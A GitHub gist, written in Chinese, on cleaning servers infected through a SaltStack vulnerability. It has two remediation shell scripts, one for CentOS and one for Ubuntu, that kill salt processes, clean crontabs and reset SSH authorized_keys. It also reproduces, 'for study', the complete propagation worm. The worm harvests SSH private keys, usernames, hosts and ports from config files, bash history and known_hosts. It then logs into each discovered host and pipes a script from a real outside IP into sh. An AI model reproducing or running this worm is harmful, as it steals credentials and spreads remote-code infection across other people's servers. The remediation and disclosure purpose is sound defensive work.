Last active
May 7, 2020 07:06
-
-
Save daimon99/4d25682111d88f998380a281a782093c to your computer and use it in GitHub Desktop.
salt 攻击病毒服务器修复脚本
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# centos 修复脚本 | |
ps -elf|grep salt|awk '{print $4}' | xargs kill -9 | |
for i in /var/spool/cron/*;do sed -i "/wget/d" $i;sed -i "/salt/d" $i;done | |
systemctl stop salt-minion | |
systemctl disable salt-minion | |
systemctl stop salt-master | |
systemctl disable salt-master | |
rm -f /root/.ssh/authorized_keys; | |
echo "<替换为你自己的新信任公钥>" > ~/.ssh/authorized_keys;chmod 600 ~/.ssh/authorized_keys; | |
for i in /home/*;do | |
echo '--> delete authorized_keys for user' $i | |
rm -f $i/.ssh/authorized_keys; | |
user=${i##*home/}; | |
echo '-->' $user; | |
sudo -u$user sh -c 'echo "<替换为你自己的新信任公钥>" > '${i}'/.ssh/authorized_keys;chmod 600 '${i}'/.ssh/authorized_keys'; | |
done | |
rm -f /tmp/sal* | |
# 验证是否完成 | |
# echo "--------> 1)看看 authorized_keys 是否加上私钥" | |
cat /home/pyer/.ssh/authorized_keys | |
# echo "--------> 2)检查是否还有异常 crontab 进程" | |
for i in /var/spool/cron/*;do cat $i;done; | |
# echo "--------> 3)检查是否 tmp 还有病毒文件" | |
ll /tmp/sa* | |
# echo "--------> 4)检查是否 还有异常进程" | |
ps -elf|grep salt | |
# echo "由于私钥泄露,建议所有服务器存有的明文密码全部修改" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# ==================== | |
# ubuntu 修复脚本 | |
ps -elf|grep salt|awk '{print $4}' | xargs kill -9 | |
for i in /var/spool/cron/crontabs/*;do sed -i "/wget/d" $i;sed -i "/salt/d" $i;done | |
systemctl stop salt-minion | |
systemctl disable salt-minion | |
systemctl stop salt-master | |
systemctl disable salt-master | |
rm -f /root/.ssh/authorized_keys; | |
echo "<替换为你自己的新信任公钥>" > ~/.ssh/authorized_keys;chmod 600 ~/.ssh/authorized_keys; | |
for i in /home/*;do | |
echo '--> delete authorized_keys for user' $i | |
rm -f $i/.ssh/authorized_keys; | |
user=${i##*home/}; | |
echo '-->' $user; | |
sudo -u$user sh -c 'echo "<替换为你自己的新信任公钥>" > '${i}'/.ssh/authorized_keys;chmod 600 '${i}'/.ssh/authorized_keys'; | |
done | |
rm -f /tmp/sal* | |
# 验证是否完成 | |
# echo "--------> 1)看看 authorized_keys 是否加上私钥" | |
cat /root/.ssh/authorized_keys | |
# echo "--------> 2)检查是否还有异常 crontab 进程" | |
for i in /var/spool/cron/crontabs/*;do cat $i;done; | |
# echo "--------> 3)检查是否 tmp 还有病毒文件" | |
ll /tmp/sa* | |
# echo "--------> 4)检查是否 还有异常进程" | |
ps -elf|grep salt | |
# echo "由于私钥泄露,建议所有服务器存有的明文密码全部修改" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# 这是病毒通过入侵 salt 漏洞后,通过私钥进一步扩散传染的脚本。可以用来学习研究。 | |
#!/bin/sh | |
localgo() { | |
myhostip=$(curl -sL icanhazip.com) | |
KEYS=$(find ~/ /root /home -maxdepth 3 -name 'id_rsa*' | grep -vw pub) | |
KEYS2=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep IdentityFile | awk -F "IdentityFile" '{print $2 }') | |
KEYS3=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | awk -F ' -i ' '{print $2}' | awk '{print $1'}) | |
KEYS4=$(find ~/ /root /home -maxdepth 3 -name '*.pem' | uniq) | |
HOSTS=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep HostName | awk -F "HostName" '{print $2}') | |
HOSTS2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}") | |
HOSTS3=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '@' '{print $2}' | awk -F '{print $1}') | |
HOSTS4=$(cat /etc/hosts | grep -vw "0.0.0.0" | grep -vw "127.0.1.1" | grep -vw "127.0.0.1" | grep -vw $myhostip | sed -r '/\n/!s/[0-9.]+/\n&\n/;/^([0-9]{1,3}\.){3}[0-9]{1,3}\n/P;D' | awk '{print $1}') | |
HOSTS5=$(cat ~/*/.ssh/known_hosts /home/*/.ssh/known_hosts /root/.ssh/known_hosts | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}" | uniq) | |
HOSTS6=$(ps auxw | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}" | grep ":22" | uniq) | |
USERZ=$( | |
echo "root" | |
find ~/ /root /home -maxdepth 2 -name '\.ssh' | uniq | xargs find | awk '/id_rsa/' | awk -F'/' '{print $3}' | uniq | |
) | |
USERZ2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -vw "cp" | grep -vw "mv" | grep -vw "cd " | grep -vw "nano" | grep -v grep | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '@' '{print $1}' | awk '{print $4}' | uniq) | |
pl=$( | |
echo "22" | |
cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -vw "cp" | grep -vw "mv" | grep -vw "cd " | grep -vw "nano" | grep -v grep | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '-p' '{print $2}' | |
) | |
sshports=$(echo "$pl" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-) | |
userlist=$(echo "$USERZ $USERZ2" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-) | |
hostlist=$(echo "$HOSTS $HOSTS2 $HOSTS3 $HOSTS4 $HOSTS5 $HOSTS6" | grep -vw 127.0.0.1 | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-) | |
keylist=$(echo "$KEYS $KEYS2 $KEYS3 $KEYS4" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-) | |
i=0 | |
for user in $userlist; do | |
for host in $hostlist; do | |
for key in $keylist; do | |
for sshp in $sshports; do | |
i=$((i+1)) | |
if [ "${i}" -eq "20" ]; then | |
sleep 20 | |
ps wx | grep "ssh -o" | awk '{print $1}' | xargs kill -9 &>/dev/null & | |
i=0 | |
fi | |
#Wait 20 seconds after every 20 attempts and clean up hanging processes | |
chmod +r $key | |
chmod 400 $key | |
echo "$user@$host $key $sshp" | |
ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i $key $user@$host -p$sshp "sudo curl -L http://95.142.44.216/s2.sh|sh; sudo wget -q -O - http://95.142.44.216/s2.sh|sh;" | |
ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i $key $user@$host -p$sshp "curl -L http://95.142.44.216/s2.sh|sh; wget -q -O - http://95.142.44.216/s2.sh|sh;" | |
done | |
done | |
done | |
done | |
} | |
localgo |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
水平有限,不完善的地方欢迎补充!